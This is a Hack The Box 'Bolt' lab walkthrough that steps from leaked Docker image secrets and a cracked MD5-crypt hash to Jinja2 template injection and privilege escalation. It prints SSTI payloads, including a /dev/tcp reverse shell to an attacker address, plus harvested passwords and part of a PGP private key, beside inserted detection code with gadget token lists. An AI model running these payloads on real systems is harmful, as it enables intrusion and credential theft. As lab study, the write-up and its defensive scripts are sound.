
[HTB Series] Bolt

ChengYingTeam (承影安全团队)


2024-07-13

0x01 Information Gathering

```
─# nmap  10.10.11.114  -p- -sC -sV  --min-rate=2000
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 08:34 EST
Nmap scan report for 10.10.11.114
Host is up (0.31s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4d:20:8a:b2:c2:8c:f5:3e:be:d2:e8:18:16:28:6e:8e (RSA)
|   256 7b:0e:c7:5f:5a:4c:7a:11:7f:dd:58:5a:17:2f:cd:ea (ECDSA)
|_  256 a7:22:4e:45:19:8e:7d:3c:bc:df:6e:1d:6c:4f:41:56 (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title:     Starter Website -  About
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
| http-title: Passbolt | Open source password manager for teams
|_Requested resource was /auth/login?redirect=%2F
| ssl-cert: Subject: commonName=passbolt.bolt.htb/organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2021-02-24T19:11:23
|_Not valid after:  2022-02-24T19:11:23
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.73 seconds
```

Visiting the site shows yet another login page, and accounts can be created. Tried it: it doesn't work and throws an error.

Opening the download reveals several virtual machine images containing some leaked information.

0x02 Vulnerability Hunting

```
─# cat repositories
{"flask-dashboard-adminlte_appseed-app":{"latest":"3350815d3bdf21771408f91da4551ca6f4e82edce74e9352ed75c2e8a5e68162"}}
```

This says the latest version is xxx. In the directory app/base/__pycache__ there are two .pyc files. The decompiled code follows:

```sh
pip3 install uncompyle6 -i https://pypi.tuna.tsinghua.edu.cn/simple/
```

Take it as a side note: the decompiled output still falls a little short of the real source. The source itself was found afterwards and is pasted below.

```python
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""

from flask import jsonify, render_template, redirect, request, url_for
from flask_login import (
    current_user,
    login_required,
    login_user,
    logout_user
)

from app import db, login_manager
from app.base import blueprint
from app.base.forms import LoginForm, CreateAccountForm
from app.base.models import User
from hmac import compare_digest as compare_hash
import crypt

@blueprint.route('/')
def route_default():
    return redirect(url_for('base_blueprint.login'))

## Login & Registration

@blueprint.route('/login', methods=['GET', 'POST'])
def login():
    login_form = LoginForm(request.form)
    if 'login' in request.form:

        # read form data
        username = request.form['username']
        password = request.form['password']

        # Locate user
        user = User.query.filter_by(username=username).first()

        # Check the password
        stored_password = user.password
        stored_password = stored_password.decode('utf-8')
        if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):

            login_user(user)
            return redirect(url_for('base_blueprint.route_default'))

        # Something (user or pass) is not ok
        return render_template( 'accounts/login.html', msg='Wrong user or password', form=login_form)

    if not current_user.is_authenticated:
        return render_template( 'accounts/login.html',
                                form=login_form)
    return redirect(url_for('home_blueprint.index'))

@blueprint.route('/register', methods=['GET', 'POST'])
def register():
    login_form = LoginForm(request.form)
    create_account_form = CreateAccountForm(request.form)
    if 'register' in request.form:

        username  = request.form['username']
        email     = request.form['email'   ]
        data = User.query.filter_by(email=email).first()
        if data is None:
            # Check usename exists
            user = User.query.filter_by(username=username).first()
            if user:
                return render_template( 'accounts/register.html',
                                        msg='Username already registered',
                                        success=False,
                                        form=create_account_form)

            # Check email exists
            user = User.query.filter_by(email=email).first()
            if user:
                return render_template( 'accounts/register.html',
                                        msg='Email already registered',
                                        success=False,
                                        form=create_account_form)

            # else we can create the user
            user = User(**request.form)
            db.session.add(user)
            db.session.commit()

            return render_template( 'accounts/register.html',
                                    msg='User created please <a href="/login">login</a>',
                                    success=True,
                                    form=create_account_form)

    else:
        return render_template( 'accounts/register.html', form=create_account_form)

@blueprint.route('/logout')
def logout():
    logout_user()
    return redirect(url_for('base_blueprint.login'))

## Errors

@login_manager.unauthorized_handler
def unauthorized_handler():
    return render_template('page-403.html'), 403

@blueprint.errorhandler(403)
def access_forbidden(error):
    return render_template('page-403.html'), 403

@blueprint.errorhandler(404)
def not_found_error(error):
    return render_template('page-404.html'), 404

@blueprint.errorhandler(500)
def internal_error(error):
    return render_template('page-500.html'), 500
```
```
└─# cat forms.py
```

```python
# uncompyle6 version 3.8.0
# Python bytecode 3.6 (3379)
# Decompiled from: Python 3.9.7 (default, Sep 24 2021, 09:43:00)
# [GCC 10.3.0]
# Embedded file name: /app/base/forms.py
# Compiled at: 2021-03-05 12:48:36
# Size of source mod 2**32: 791 bytes
"""
Copyright (c) 2019 - present AppSeed.us
"""
from flask_wtf import FlaskForm
from wtforms import TextField, PasswordField
from wtforms.validators import InputRequired, Email, DataRequired

class LoginForm(FlaskForm):
    username = TextField('Username', id='username_login', validators=[DataRequired()])
    password = PasswordField('Password', id='pwd_login', validators=[DataRequired()])


class CreateAccountForm(FlaskForm):
    username = TextField('Username', id='username_create', validators=[DataRequired()])
    email = TextField('Email', id='email_create', validators=[DataRequired(), Email()])
    password = PasswordField('Password', id='pwd_create', validators=[DataRequired()])
# okay decompiling forms.cpython-36.pyc
```

There is a lot here, so first look at what matters. List the contents of every layer tarball:

```python
import glob
import os

# Assumed: `a` is the list of layer tarballs extracted from the image (the post does not show how it was built)
a = glob.glob("*/layer.tar")
for i in a:
    # note the space after -tvf; without it the command becomes "tar -tvf<path>" and fails
    os.system("tar -tvf " + i)
```

A few notable files:

```
a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar
-rw-r--r-- root/root     16384 2021-03-05 12:44 db.sqlite3

2265c5097f0b290a53b7556fd5d721ffad8a4921bfc2a6e378c04859185d27fa/layer.tar
-rw-r--r-- root/root       791 2021-03-05 12:48 app/base/forms.py
-rw-r--r-- root/root      3778 2021-03-05 12:49 app/base/routes.py

745959c3a65c3899f9e1a5319ee5500f199e0cadf8d487b92e2f297441f8c5cf/layer.tar
-rw-r--r-- root/root       142 2021-03-05 06:11 .env
-rw-r--r-- root/root      1448 2021-03-05 09:22 config.py
-rw-r--r-- root/root       198 2021-03-05 06:11 gunicorn-cfg.py
-rw-r--r-- root/root       116 2021-03-05 07:40 requirements.txt
-rw-r--r-- root/root       955 2021-03-05 06:11 run.py
```
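The listing above (a layer carrying .env, config.py and db.sqlite3) is exactly what a build pipeline should catch before an image is published. As an added example that is not part of the original post, the Python below builds a small docker-save style image tarball in memory (constructed data, with placeholder layer ids) and inventories every layer.tar, flagging sensitive-looking paths. The sensitive-name list is an assumption meant to be extended.

```python
"""Inventory the layers of a saved container image and flag files that often leak secrets.

Added example: builds a docker-save style tarball in memory (constructed sample data)
instead of reading the real image.tar from the box, then lists each layer.tar.
"""
import io
import json
import tarfile

# Filenames that frequently carry credentials or configuration (assumption: a starter list).
SENSITIVE_NAMES = {".env", "config.py", "gunicorn-cfg.py", "db.sqlite3", "id_rsa", "credentials"}
SENSITIVE_SUFFIXES = (".sqlite3", ".pem", ".key", ".env")


def _tar_bytes(files):
    """Build an in-memory tar archive from a {path: bytes} mapping."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def build_sample_image():
    """Constructed stand-in for image.tar: a 'repositories' index plus two layer.tar entries."""
    layer_a = _tar_bytes({"app/base/forms.py": b"# forms", "app/base/routes.py": b"# routes"})
    layer_b = _tar_bytes({".env": b"SECRET_KEY=placeholder", "config.py": b"# config",
                          "db.sqlite3": b"\x00" * 16, "run.py": b"# run"})
    repositories = {"flask-dashboard-adminlte_appseed-app": {"latest": "aaaa" * 16}}
    return _tar_bytes({
        "repositories": json.dumps(repositories).encode(),
        "aaaa/layer.tar": layer_a,   # placeholder layer ids, not the real digests
        "bbbb/layer.tar": layer_b,
    })


def list_layers(image_bytes):
    """Return {layer_dir: [member paths]} for every */layer.tar inside the image tarball."""
    layers = {}
    with tarfile.open(fileobj=io.BytesIO(image_bytes)) as image:
        for member in image.getmembers():
            if not member.name.endswith("/layer.tar"):
                continue
            layer_dir = member.name.rsplit("/", 1)[0]
            raw = image.extractfile(member).read()
            with tarfile.open(fileobj=io.BytesIO(raw)) as layer:
                layers[layer_dir] = [m.name for m in layer.getmembers() if m.isfile()]
    return layers


def is_sensitive(path):
    """Match on the basename only, so nested copies (app/.env) are caught too."""
    name = path.rsplit("/", 1)[-1]
    return name in SENSITIVE_NAMES or name.endswith(SENSITIVE_SUFFIXES)


def find_sensitive(image_bytes):
    """Return sorted (layer_dir, path) pairs worth reviewing before an image ships."""
    hits = []
    for layer_dir, paths in list_layers(image_bytes).items():
        hits.extend((layer_dir, p) for p in paths if is_sensitive(p))
    return sorted(hits)


if __name__ == "__main__":
    for layer_dir, path in find_sensitive(build_sample_image()):
        print(f"{layer_dir}/layer.tar: {path}")
```

Because each layer is a tar inside the outer tar, a file deleted in a later layer is still present in the earlier one; inventorying every layer.tar rather than the merged filesystem is what surfaces such leftovers.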

config.py contains an SQLite3 connection string and the username and password of a PostgreSQL database.

```python
#PostgreSQL database
SQLALCHEMY_DATABASE_URI = '{}://{}:{}@{}:{}/{}'.format(
    config( 'DB_ENGINE'   , default='postgresql'    ),
    config( 'DB_USERNAME' , default='appseed'       ),
    config( 'DB_PASS'     , default='pass'          ),
    config( 'DB_HOST'     , default='localhost'     ),
    config( 'DB_PORT'     , default=5432            ),
    config( 'DB_NAME'     , default='appseed-flask' )
)
```

```
admin   admin@bolt.htb  $1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.
```

That is the password hash. The login endpoint shows how the password is checked:

```python
        # read form data
        username = request.form['username']
        password = request.form['password']

        # Locate user
        user = User.query.filter_by(username=username).first()

        # Check the password
        stored_password = user.password
        stored_password = stored_password.decode('utf-8')
        if user and compare_hash(stored_password,crypt.crypt(password,stored_password)):

            login_user(user)
            return redirect(url_for('base_blueprint.route_default'))
```

Per the code logic, the key point is that the user is looked up by username, and login succeeds when the user exists and crypt(password, stored_hash), which reuses the salt embedded in the stored hash ($1$sm1RceCh$... is MD5-crypt with salt sm1RceCh), compares equal to that stored hash. That confused me at first, but it is just a standard crypt(3)-style check, so the hash can be attacked offline. Cracking it gives:

admin/deadbolt
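To make the check above concrete, here is an added example (not code from the original post or from the AppSeed application): a pure-Python port of the classic crypt(3) MD5 scheme (Poul-Henning Kamp's algorithm) with a verify() that mirrors the app's compare, plus an optional cross-check against the platform crypt(3). The port is used because Python's crypt module was removed in 3.13; the salt and hash are the ones recovered from db.sqlite3 above.

```python
"""MD5-crypt ($1$) as used by the decompiled login(): recompute and compare in constant time.

Added example. The hash routine is a pure-Python port of the classic crypt(3) MD5 scheme,
so it runs where Python's crypt module is absent (removed in Python 3.13).
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"

# Stored hash of the admin row from the post (cracked password on the page: deadbolt).
STORED_HASH = "$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q."


def _to64(value, count):
    """crypt(3)'s custom base64: emit `count` 6-bit groups, least significant first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5_crypt(password, salt):
    pw = password.encode()
    salt = salt.encode()[:8]                    # the scheme uses at most 8 salt characters
    ctx = hashlib.md5(pw + MAGIC + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    n = len(pw)
    while n > 0:                                # mix in len(pw) bytes of the alternate sum
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                                    # the bit walk over len(pw)
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):                       # fixed 1000-round stretch: the only slowdown
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    encoded = "".join([
        _to64((final[0] << 16) | (final[6] << 8) | final[12], 4),
        _to64((final[1] << 16) | (final[7] << 8) | final[13], 4),
        _to64((final[2] << 16) | (final[8] << 8) | final[14], 4),
        _to64((final[3] << 16) | (final[9] << 8) | final[15], 4),
        _to64((final[4] << 16) | (final[10] << 8) | final[5], 4),
        _to64(final[11], 2),
    ])
    return f"$1${salt.decode()}${encoded}"


def verify(stored_hash, candidate):
    """Mirror of the app's check: the salt is taken from the stored hash itself."""
    if stored_hash is None or not stored_hash.startswith("$1$"):
        return False                            # unknown user or foreign scheme: fail closed
    salt = stored_hash[3:].split("$", 1)[0]
    return hmac.compare_digest(md5_crypt(candidate, salt), stored_hash)


def matches_system_crypt(password, salt):
    """Cross-check against crypt(3) where Python still ships the crypt module; None if unavailable."""
    try:
        import crypt
    except ImportError:
        return None
    ref = crypt.crypt(password, f"$1${salt}$")
    if not ref.startswith("$1$"):
        return None                             # platform libc without MD5-crypt support
    return ref == md5_crypt(password, salt)


if __name__ == "__main__":
    print("system crypt agrees:", matches_system_crypt("deadbolt", "sm1RceCh"))
    print("login would succeed:", verify(STORED_HASH, "deadbolt"))
```

Two things the decompiled login() gets wrong are visible here: verify() returns False for a missing user instead of reading user.password before the `if user` test, and MD5-crypt's fixed 1000 MD5 rounds are why a wordlist attack on this hash is cheap compared with a modern memory-hard scheme.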

At this point it feels like there is nothing more here.

Scanning for vhosts finds two subdomains: demo and mail.

So now there are three sites:

```
demo.bolt.htb      # a login page; accounts can be created, but an invite code is required
mail.bolt.htb      # a login page
passbolt.bolt.htb  # AdminLTE3
```

config.py also configures a SECRET_KEY, default='S#perS3crEt_007'.

Tried it; no luck.

After a long search, found it. The invite code is 'XNSS-HSJW-3NGU-8XTJ'; register with it:

```sh
curl -i -s -k -X $'POST' \
    -H $'Host: demo.bolt.htb' \
    --data-binary $'\x0d\x0ausername=123&email=123@qq.com&password=123&invite_code=XNSS-HSJW-3NGU-8XTJ' \
    $'http://demo.bolt.htb/register'
```

After registering, the same account can log in to mail, which appears to be a mail server.

Once logged in to the mail service, changing a profile setting causes an email to be delivered. Since the app is Python, try template injection.

After saving, a new email arrives containing 10000, which shows that the name parameter is vulnerable to SSTI.

```
{{"".__class__.__bases__[0].__subclasses__()}}
```

Looking through the list, Popen is the 223rd entry:

```
{{"".__class__.__bases__[0].__subclasses__()[222]}}
<class 'subprocess.Popen'>
```

Calling its __init__ from there does not work:

```
{{"".__class__.__bases__[0].__subclasses__()[222].__init__}}
<slot wrapper '__init__' of 'object' objects>
```

Since the template engine is Jinja2, I searched for a payload:

```
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen("whoami").read()}}

www-data
```
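From the defender's side, the probes above ({{100*100}}-style arithmetic, __class__/__subclasses__ walks, the cycler/popen gadget) are easy to spot in a profile-update request before the value ever reaches a template. The following is an added example, not code from the original post or from the target application: a stdlib-only classifier that URL-decodes form fields and labels each one clean, probe or exploit. The sample forms are constructed and the token list is an assumption to be tuned.

```python
"""Flag server-side template injection probes in user-supplied profile fields.

Added example. Scans form values the way a request filter or log review would,
using the payload shapes from the post as constructed samples.
"""
import re
from urllib.parse import unquote_plus

# Jinja2 delimiters: any of these inside a display-name field is already suspicious.
TEMPLATE_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\{#.*?#\}", re.S)
# Attribute walks and gadgets that only make sense if the input is executed as a template
# (assumption: a starter list; extend from your own template engine's known gadgets).
GADGET_TOKENS = (
    "__class__", "__bases__", "__mro__", "__subclasses__", "__globals__", "__init__",
    "__builtins__", "_TemplateReference__context", "cycler", "popen", "subprocess",
)
# The classic "does it evaluate?" probe: {{7*7}}, {{100*100}} and friends.
ARITHMETIC_PROBE = re.compile(r"\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}")


def classify(value):
    """Return (level, reasons): 'clean', 'probe' (template syntax only) or 'exploit' (gadgets)."""
    text = unquote_plus(value)          # form bodies arrive URL-encoded
    reasons = []
    if ARITHMETIC_PROBE.search(text):
        reasons.append("arithmetic probe")
    elif TEMPLATE_DELIMS.search(text):
        reasons.append("template delimiters")
    hits = [t for t in GADGET_TOKENS if t in text]
    if hits:
        reasons.append("gadgets: " + ", ".join(hits))
        return "exploit", reasons
    return ("probe" if reasons else "clean"), reasons


def scan_form(form):
    """Classify every field of a decoded form dict; returns only the non-clean ones."""
    findings = {}
    for field, value in form.items():
        level, reasons = classify(value)
        if level != "clean":
            findings[field] = (level, reasons)
    return findings


# Constructed samples modelled on the profile-update request from the post.
SAMPLE_FORMS = [
    {"name": "Eddie Johnson", "email": "eddie@bolt.htb"},
    {"name": "{{100*100}}"},
    {"name": '{{"".__class__.__bases__[0].__subclasses__()[222]}}'},
    {"name": "%7B%7B+self._TemplateReference__context.cycler.__init__.__globals__"
             ".os.popen%28%22id%22%29.read%28%29%7D%7D"},
]

if __name__ == "__main__":
    for form in SAMPLE_FORMS:
        print(scan_form(form))
```

Blocking on these patterns is a detection aid, not the fix: the fix is to never build template source from user input (render the name as a template variable, and keep the Jinja2 SandboxedEnvironment for anything that must be user-authored).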

0x03 Getting a Shell

Send the payload the same way:

```
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1"').read() }}
```

```
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.11.114] 50808
bash: cannot set terminal process group (1012): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bolt:~/demo$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bolt:~/demo$ whoami
whoami
www-data
```

0x04 Privilege Escalation

```
www-data@bolt:~/demo$ cat /etc/passwd|grep -v nologin |grep -v false
cat /etc/passwd|grep -v nologin |grep -v false
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
eddie:x:1000:1000:Eddie Johnson,,,:/home/eddie:/bin/bash
clark:x:1001:1001:Clark Griswold,,,:/home/clark:/bin/bash
```

www-data -> eddie

```
[-] /etc/init/ config file permissions:
total 24
drwxr-xr-x   2 root root  4096 Sep  9 10:07 .
drwxr-xr-x 135 root root 12288 Sep 20 15:05 ..
-rw-r--r--   1 root root  1757 Nov  6  2019 mysql.conf
-rw-r--r--   1 root root   453 Dec  2  2020 whoopsie.conf

[-] Any interesting mail in /var/mail:
total 24
drwxrwsr-x  3 root     mail 4096 Dec 17 00:27 .
drwxr-xr-x 15 root     root 4096 Aug  4 13:06 ..
drwx--S---  5     5001 mail 4096 Dec 19 08:23 123
-rw-------  1 eddie    mail  909 Feb 25  2021 eddie
-rw-------  1 root     mail    1 Mar  3  2021 root
-rw-------  1 www-data mail    1 Mar  3  2021 www-data
```

Nothing exploitable found there.

Search for files by owner:

```
www-data@bolt:/var/lib/passbolt/tmp$ find /etc -user www-data 2>/dev/null
find /etc -user www-data 2>/dev/null
/etc/passbolt/Seeds
```

passbolt.php contains a password, rT2;jW7<eY8!dX8}pQ8%. The key parts of the file:

```php
return [
    'App' => [
        // A base URL to use for absolute links.
        // The url where the passbolt instance will be reachable to your end users.
        // This information is need to render images in emails for example
        'fullBaseUrl' => 'https://passbolt.bolt.htb',
    ],

    // Database configuration.
    'Datasources' => [
        'default' => [
            'host' => 'localhost',
            'port' => '3306',
            'username' => 'passbolt',
            'password' => 'rT2;jW7<eY8!dX8}pQ8%',
            'database' => 'passboltdb',
        ],
    ],
```

Connected to the database; nothing critical in it.

```
select * from users;
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| id                                   | role_id                              | username       | active | deleted | created             | modified            |
+--------------------------------------+--------------------------------------+----------------+--------+---------+---------------------+---------------------+
| 4e184ee6-e436-47fb-91c9-dccb57f250bc | 1cfcd300-0664-407e-85e6-c11664a7d86c | eddie@bolt.htb |      1 |       0 | 2021-02-25 21:42:50 | 2021-02-25 21:55:06 |
| 9d8a0452-53dc-4640-b3a7-9a3d86b0ff90 | 975b9a56-b1b1-453c-9362-c238a85dad76 | clark@bolt.htb |      1 |       0 | 2021-02-25 21:40:29 | 2021-02-25 21:42:32 |
```

There is also something odd:

```
-----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc
g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY
pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H
oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px
l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R
zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp
edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u
l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt
oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7
FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov
8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey
5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY
NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a
Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs
nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6
TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984
=P38i
-----END PGP MESSAGE-----
```

eddie -> root

OpenPGP is an encryption tool.

Compared with before we now have one more password, the database one. Try it for switching users.

It works for eddie.

In eddie's mailbox there is an email from the user Clark mentioning the password management system and backing up the private key. The email:

```
eddie@bolt:/var/mail$ cat eddie
cat eddie
From clark@bolt.htb  Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)
        id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>

Hey Eddie,

The password management server is up and running.  Go ahead and download the extension to your browser and get logged in.  Be sure to back up your private key because I CANNOT recover it.  Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords.  Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...

-Clark
```

Also found CVE-2021-22555.

Tried one from GitHub; it did not work. Will revisit later.

One more piece of information:

```
══════════╣ Do I have PGP keys?
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found
```

What is PGP???

https://gist.github.com/jhjguxin/6037564

If you are not familiar with it, test locally first.

```
══╣ Possible private SSH keys were found!
/etc/ImageMagick-6/mime.xml
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/index.min.js
/home/eddie/.config/google-chrome/Default/Extensions/didegimhafipceonhjepacocaffmoppf/3.0.5_0/vendors/openpgp.js
/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log
```

That file contains three public keys and one private key. The private key:

```
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

xcMGBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi
fjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk
cpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU
RNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU
+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a
If70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB
AAH+CQMINK+e85VtWtjguB8IR+AfuDbIzHyKKvMfGStRhZX5cdsUfv5znicW
UjeGmI+w7iQ+WYFlmjFN/Qd527qOFOZkm6TgDMUVubQFWpeDvhM4F3Y+Fhua
jS8nQauoC87vYCRGXLoCrzvM03IpepDgeKqVV5r71gthcc2C/Rsyqd0BYXXA
iOe++biDBB6v/pMzg0NHUmhmiPnSNfHSbABqaY3WzBMtisuUxOzuvwEIRdac
2eEUhzU4cS8s1QyLnKO8ubvD2D4yVk+ZAxd2rJhhleZDiASDrIDT9/G5FDVj
QY3ep7tx0RTE8k5BE03NrEZi6TTZVa7MrpIDjb7TLzAKxavtZZYOJkhsXaWf
DRe3Gtmo/npea7d7jDG2i1bn9AJfAdU0vkWrNqfAgY/r4j+ld8o0YCP+76K/
7wiZ3YYOBaVNiz6L1DD0B5GlKiAGf94YYdl3rfIiclZYpGYZJ9Zbh3y4rJd2
AZkM+9snQT9azCX/H2kVVryOUmTP+uu+p+e51z3mxxngp7AE0zHqrahugS49
tgkE6vc6G3nG5o50vra3H21kSvv1kUJkGJdtaMTlgMvGC2/dET8jmuKs0eHc
Uct0uWs8LwgrwCFIhuHDzrs2ETEdkRLWEZTfIvs861eD7n1KYbVEiGs4n2OP
yF1ROfZJlwFOw4rFnmW4Qtkq+1AYTMw1SaV9zbP8hyDMOUkSrtkxAHtT2hxj
XTAuhA2i5jQoA4MYkasczBZp88wyQLjTHt7ZZpbXrRUlxNJ3pNMSOr7K/b3e
IHcUU5wuVGzUXERSBROU5dAOcR+lNT+Be+T6aCeqDxQo37k6kY6Tl1+0uvMp
eqO3/sM0cM8nQSN6YpuGmnYmhGAgV/Pj5t+cl2McqnWJ3EsmZTFi37Lyz1CM
vjdUlrpzWDDCwA8VHN1QxSKv4z2+QmXSzR5FZGRpZSBKb2huc29uIDxlZGRp
ZUBib2x0Lmh0Yj7CwI0EEAEIACAFAmA4G2EGCwkHCAMCBBUICgIEFgIBAAIZ
AQIbAwIeAQAhCRAcJ0Gj3DtKvRYhBN9Ca8ekqK9Y5Q7aDhwnQaPcO0q9+Q0H
/R2ThWBN8roNk7hCWO6vUH8Da1oXyR5jsHTNZAileV5wYnN+egxf1Yk9/qXF
nyG1k/IImCGf9qmHwHe+EvoDCgYpvMAQB9Ce1nJ1CPqcv818WqRsQRdLnyba
qx5j2irDWkFQhFd3Q806pVUYtL3zgwpupLdxPH/Bj2CvTIdtYD454aDxNbNt
zc5gVIg7esI2dnTkNnFWoFZ3+j8hzFmS6lJvJ0GN+Nrd/gAOkhU8P2KcDz74
7WQQR3/eQa0m6QhOQY2q/VMgfteMejlHFoZCbu0IMkqwsAINmiiAc7H1qL3F
U3vUZKav7ctbWDpJU/ZJ++Q/bbQxeFPPkM+tZEyAn/fHwwYEYDgbYQEIAJpY
HMNw6lcxAWuZPXYz7FEyVjilWObqMaAael9B/Z40fVH29l7ZsWVFHVf7obW5
zNJUpTZHjTQV+HP0J8vPL35IG+usXKDqOKvnzQhGXwpnEtgMDLFJc2jw0I6M
KeFfplknPCV6uBlznf5q6KIm7YhHbbyuKczHb8BgspBaroMkQy5LHNYXw2FP
rOUeNkzYjHVuzsGAKZZzo4BMTh/H9ZV1ZKm7KuaeeE2x3vtEnZXx+aSX+Bn8
Ko+nUJZEn9wzHhJwcsRGV94pnihqwlJsCzeDRzHlLORF7i57n7rfWkzIW8P7
XrU7VF0xxZP83OxIWQ0dXd5pA1fN3LRFIegbhJcAEQEAAf4JAwizGF9kkXhP
leD/IYg69kTvFfuw7JHkqkQF3cBf3zoSykZzrWNW6Kx2CxFowDd/a3yB4moU
KP9sBvplPPBrSAQmqukQoH1iGmqWhGAckSS/WpaPSEOG3K5lcpt5EneFC64f
a6yNKT1Z649ihWOv+vpOEftJVjOvruyblhl5QMNUPnvGADHdjZ9SRmo+su67
JAKMm0cf1opW9x+CMMbZpK9m3QMyXtKyEkYP5w3EDMYdM83vExb0DvbUEVFH
kERD10SVfII2e43HFgU+wXwYR6cDSNaNFdwbybXQ0quQuUQtUwOH7t/Kz99+
Ja9e91nDa3oLabiqWqKnGPg+ky0oEbTKDQZ7Uy66tugaH3H7tEUXUbizA6cT
Gh4htPq0vh6EJGCPtnyntBdSryYPuwuLI5WrOKT+0eUWkMA5NzJwHbJMVAlB
GquB8QmrJA2QST4v+/xnMLFpKWtPVifHxV4zgaUF1CAQ67OpfK/YSW+nqong
cVwHHy2W6hVdr1U+fXq9XsGkPwoIJiRUC5DnCg1bYJobSJUxqXvRm+3Z1wXO
